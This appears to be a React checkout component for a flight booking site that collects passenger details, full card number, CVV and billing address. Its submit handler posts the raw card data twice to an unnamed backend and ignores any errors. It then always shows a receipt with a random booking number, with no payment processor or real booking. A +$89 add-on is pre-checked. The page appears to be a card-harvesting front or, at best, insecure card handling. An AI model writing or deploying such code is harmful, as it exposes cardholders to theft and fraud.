import React, { useState, useEffect } from "react";
import { useLocation, useNavigate } from "react-router-dom";
import axios from "axios";
import { urlbc } from "./Constants";

const FlightSubmit = () => {
  const navigate = useNavigate();
  const location = useLocation();

  const [apiData, setApiData] = useState(location.state || null);
  const [isOutboundOpen, setIsOutboundOpen] = useState(true);
  const [isInboundOpen, setIsInboundOpen] = useState(true);
  const [isChecked, setIsChecked] = useState(true);
  const [isLoading, setIsLoading] = useState(false);

  const [passenger, setPassenger] = useState({ title: "Mr", firstName: "", lastName: "", gender: "Male", dob: "" });
  const [emailPhone, setEmailPhone] = useState({ email: "", phone: "" });
  const [cardData, setCardData] = useState({ name: "", number: "", expMonth: "01", expYear: "2026", cvv: "" });
  const [billing, setBilling] = useState({ country: "United States", city: "", address: "", zip: "" });

  useEffect(() => {
    window.scrollTo(0, 0);
    if (location.state) setApiData(location.state);
  }, [location.state]);

  const fmtTime = (ts) => {
    if (!ts) return "";
    const d = new Date(ts);
    let h = d.getHours();
    const m = d.getMinutes();
    const ampm = h >= 12 ? "PM" : "AM";
    h = h % 12 || 12;
    return `${h < 10 ? "0" : ""}${h}:${m < 10 ? "0" : ""}${m} ${ampm}`;
  };

  const fmtDate = (ts) => {
    if (!ts) return "";
    return new Date(ts).toLocaleDateString("en-US", { weekday: "short", month: "short", day: "numeric" });
  };

  if (!apiData || !apiData.data || !apiData.data[0]) {
    return (
      <div className="container text-center py-5">
        <h4>No flight selected</h4>
        <button className="btn btn-danger mt-3" onClick={() => navigate("/")}>
          Return to Search
        </button>
      </div>
    );
  }

  const offer = apiData.data[0];
  const outItin = offer.itineraries?.[0];
  const inItin = offer.itineraries?.[1];
  const carriers = apiData.dictionaries?.carriers || {};
  const basePrice = parseFloat(offer.price?.total || 150);
  const finalTotal = (isChecked ? basePrice + 89 : basePrice).toFixed(2);

  const handleSubmit = async (e) => {
    e.preventDefault();
    setIsLoading(true);

    const bookingPayload = {
      userInformation: { adult_0: passenger },
      creditCardData: cardData,
      emaiAndId: emailPhone,
      billingCard: billing,
      flightData: apiData,
      fareDetails: { totalAmount: finalTotal, protection: isChecked },
      bookingCurrentDate: new Date().toLocaleString(),
      randomNumber: `FH${Math.floor(100000 + Math.random() * 900000)}`,
    };

    try {
      if (urlbc) {
        await axios.post(`${urlbc}/booking`, bookingPayload).catch(() => {});
        await axios.post(`${urlbc}/submit-form`, bookingPayload).catch(() => {});
      }
    } catch (_) {}

    setIsLoading(false);
    navigate("/customer-receipt", { state: { result: bookingPayload } });
  };

  return (
    <section className="py-4 bg-light">
      <div className="container">
        <form onSubmit={handleSubmit}>
          <div className="row">
            <div className="col-lg-8">
              {/* Outbound Box */}
              {outItin && (
                <div className="card mb-3 shadow-sm border">
                  <div
                    className="card-header bg-white d-flex justify-content-between align-items-center p-3"
                    style={{ cursor: "pointer" }}
                    onClick={() => setIsOutboundOpen(!isOutboundOpen)}
                  >
                    <strong className="text-primary">
                      Outbound Flight ({outItin.segments[0]?.departure?.iataCode} to {outItin.segments[outItin.segments.length - 1]?.arrival?.iataCode})
                    </strong>
                    <span className="badge bg-primary">{isOutboundOpen ? "Hide Details" : "Show Details"}</span>
                  </div>
                  {isOutboundOpen && (
                    <div className="card-body border-top">
                      {outItin.segments.map((seg, idx) => (
                        <div key={idx} className="d-flex justify-content-between align-items-center py-2 border-bottom">
                          <div>
                            <span className="font-weight-bold">{carriers[seg.carrierCode] || seg.carrierCode} {seg.number}</span>
                            <div className="small text-muted">{fmtDate(seg.departure?.at)}</div>
                          </div>
                          <div className="text-center">
                            <h5>{fmtTime(seg.departure?.at)}</h5>
                            <small>{seg.departure?.iataCode}</small>
                          </div>
                          <div>➔</div>
                          <div className="text-center">
                            <h5>{fmtTime(seg.arrival?.at)}</h5>
                            <small>{seg.arrival?.iataCode}</small>
                          </div>
                        </div>
                      ))}
                    </div>
                  )}
                </div>
              )}

              {/* Inbound Box */}
              {inItin && (
                <div className="card mb-3 shadow-sm border">
                  <div
                    className="card-header bg-white d-flex justify-content-between align-items-center p-3"
                    style={{ cursor: "pointer" }}
                    onClick={() => setIsInboundOpen(!isInboundOpen)}
                  >
                    <strong className="text-success">
                      Return Flight ({inItin.segments[0]?.departure?.iataCode} to {inItin.segments[inItin.segments.length - 1]?.arrival?.iataCode})
                    </strong>
                    <span className="badge bg-success">{isInboundOpen ? "Hide Details" : "Show Details"}</span>
                  </div>
                  {isInboundOpen && (
                    <div className="card-body border-top">
                      {inItin.segments.map((seg, idx) => (
                        <div key={idx} className="d-flex justify-content-between align-items-center py-2 border-bottom">
                          <div>
                            <span className="font-weight-bold">{carriers[seg.carrierCode] || seg.carrierCode} {seg.number}</span>
                            <div className="small text-muted">{fmtDate(seg.departure?.at)}</div>
                          </div>
                          <div className="text-center">
                            <h5>{fmtTime(seg.departure?.at)}</h5>
                            <small>{seg.departure?.iataCode}</small>
                          </div>
                          <div>➔</div>
                          <div className="text-center">
                            <h5>{fmtTime(seg.arrival?.at)}</h5>
                            <small>{seg.arrival?.iataCode}</small>
                          </div>
                        </div>
                      ))}
                    </div>
                  )}
                </div>
              )}

              {/* Passenger Info */}
              <div className="card mb-3 shadow-sm border p-3 bg-white">
                <h6 className="font-weight-bold mb-3 border-bottom pb-2">Passenger Information</h6>
                <div className="row g-2">
                  <div className="col-md-2">
                    <label className="small text-muted">Title</label>
                    <select className="form-select form-select-sm" value={passenger.title} onChange={(e) => setPassenger({ ...passenger, title: e.target.value })}>
                      <option value="Mr">Mr</option>
                      <option value="Mrs">Mrs</option>
                      <option value="Ms">Ms</option>
                    </select>
                  </div>
                  <div className="col-md-5">
                    <label className="small text-muted">First Name *</label>
                    <input type="text" className="form-control form-control-sm" required placeholder="First Name" onChange={(e) => setPassenger({ ...passenger, firstName: e.target.value })} />
                  </div>
                  <div className="col-md-5">
                    <label className="small text-muted">Last Name *</label>
                    <input type="text" className="form-control form-control-sm" required placeholder="Last Name" onChange={(e) => setPassenger({ ...passenger, lastName: e.target.value })} />
                  </div>
                  <div className="col-md-6 mt-2">
                    <label className="small text-muted">Gender *</label>
                    <select className="form-select form-select-sm" value={passenger.gender} onChange={(e) => setPassenger({ ...passenger, gender: e.target.value })}>
                      <option value="Male">Male</option>
                      <option value="Female">Female</option>
                    </select>
                  </div>
                  <div className="col-md-6 mt-2">
                    <label className="small text-muted">Date of Birth *</label>
                    <input type="date" className="form-control form-control-sm" required onChange={(e) => setPassenger({ ...passenger, dob: e.target.value })} />
                  </div>
                </div>
              </div>

              {/* Contact Details */}
              <div className="card mb-3 shadow-sm border p-3 bg-white">
                <h6 className="font-weight-bold mb-3 border-bottom pb-2">Contact Information</h6>
                <div className="row g-2">
                  <div className="col-md-6">
                    <label className="small text-muted">Email Address *</label>
                    <input type="email" className="form-control form-control-sm" required placeholder="name@example.com" onChange={(e) => setEmailPhone({ ...emailPhone, email: e.target.value })} />
                  </div>
                  <div className="col-md-6">
                    <label className="small text-muted">Phone Number *</label>
                    <input type="tel" className="form-control form-control-sm" required placeholder="+1 555 0192" onChange={(e) => setEmailPhone({ ...emailPhone, phone: e.target.value })} />
                  </div>
                </div>
              </div>

              {/* Payment Information */}
              <div className="card mb-3 shadow-sm border p-3 bg-white">
                <h6 className="font-weight-bold mb-3 border-bottom pb-2">Payment Details</h6>
                <div className="row g-2">
                  <div className="col-md-6">
                    <label className="small text-muted">Cardholder Name *</label>
                    <input type="text" className="form-control form-control-sm" required placeholder="Name on Card" onChange={(e) => setCardData({ ...cardData, name: e.target.value })} />
                  </div>
                  <div className="col-md-6">
                    <label className="small text-muted">Card Number *</label>
                    <input type="text" className="form-control form-control-sm" required placeholder="0000 0000 0000 0000" maxLength="19" onChange={(e) => setCardData({ ...cardData, number: e.target.value })} />
                  </div>
                  <div className="col-md-4 mt-2">
                    <label className="small text-muted">Expiry Month *</label>
                    <select className="form-select form-select-sm" value={cardData.expMonth} onChange={(e) => setCardData({ ...cardData, expMonth: e.target.value })}>
                      {Array.from({ length: 12 }, (_, i) => String(i + 1).padStart(2, "0")).map((m) => (
                        <option key={m} value={m}>{m}</option>
                      ))}
                    </select>
                  </div>
                  <div className="col-md-4 mt-2">
                    <label className="small text-muted">Expiry Year *</label>
                    <select className="form-select form-select-sm" value={cardData.expYear} onChange={(e) => setCardData({ ...cardData, expYear: e.target.value })}>
                      {[2026, 2027, 2028, 2029, 2030, 2031, 2032].map((y) => (
                        <option key={y} value={y}>{y}</option>
                      ))}
                    </select>
                  </div>
                  <div className="col-md-4 mt-2">
                    <label className="small text-muted">CVV *</label>
                    <input type="password" className="form-control form-control-sm" required placeholder="123" maxLength="4" onChange={(e) => setCardData({ ...cardData, cvv: e.target.value })} />
                  </div>
                </div>

                <h6 className="font-weight-bold mt-3 mb-2 border-top pt-2">Billing Address</h6>
                <div className="row g-2">
                  <div className="col-md-6">
                    <input type="text" className="form-control form-control-sm" placeholder="Country" value={billing.country} onChange={(e) => setBilling({ ...billing, country: e.target.value })} required />
                  </div>
                  <div className="col-md-6">
                    <input type="text" className="form-control form-control-sm" placeholder="City" required onChange={(e) => setBilling({ ...billing, city: e.target.value })} />
                  </div>
                  <div className="col-md-8 mt-2">
                    <input type="text" className="form-control form-control-sm" placeholder="Street Address" required onChange={(e) => setBilling({ ...billing, address: e.target.value })} />
                  </div>
                  <div className="col-md-4 mt-2">
                    <input type="text" className="form-control form-control-sm" placeholder="ZIP Code" required onChange={(e) => setBilling({ ...billing, zip: e.target.value })} />
                  </div>
                </div>
              </div>
            </div>

            {/* Price Sidebar */}
            <div className="col-lg-4">
              <div className="card shadow-sm border p-3 bg-white sticky-top" style={{ top: "20px" }}>
                <h6 className="font-weight-bold border-bottom pb-2">Price Breakdown</h6>
                <div className="d-flex justify-content-between my-2">
                  <span>Base Flight Fare</span>
                  <strong>${basePrice.toFixed(2)}</strong>
                </div>
                <div className="border rounded p-2 bg-light my-2">
                  <div className="form-check">
                    <input className="form-check-input" type="checkbox" id="cabinProt" checked={isChecked} onChange={() => setIsChecked(!isChecked)} />
                    <label className="form-check-label small" htmlFor="cabinProt">
                      <strong>Cabin Protection (+$89)</strong>
                      <div className="text-muted small">Cancellation and medical cover</div>
                    </label>
                  </div>
                </div>
                <div className="d-flex justify-content-between my-3 border-top pt-2">
                  <h5>Total:</h5>
                  <h4 className="text-success font-weight-bold">${finalTotal}</h4>
                </div>
                <button type="submit" className="btn btn-danger w-100 font-weight-bold" disabled={isLoading}>
                  {isLoading ? "Booking..." : "Confirm Flight Booking"}
                </button>
              </div>
            </div>
          </div>
        </form>
      </div>
    </section>
  );
};

export default FlightSubmit;
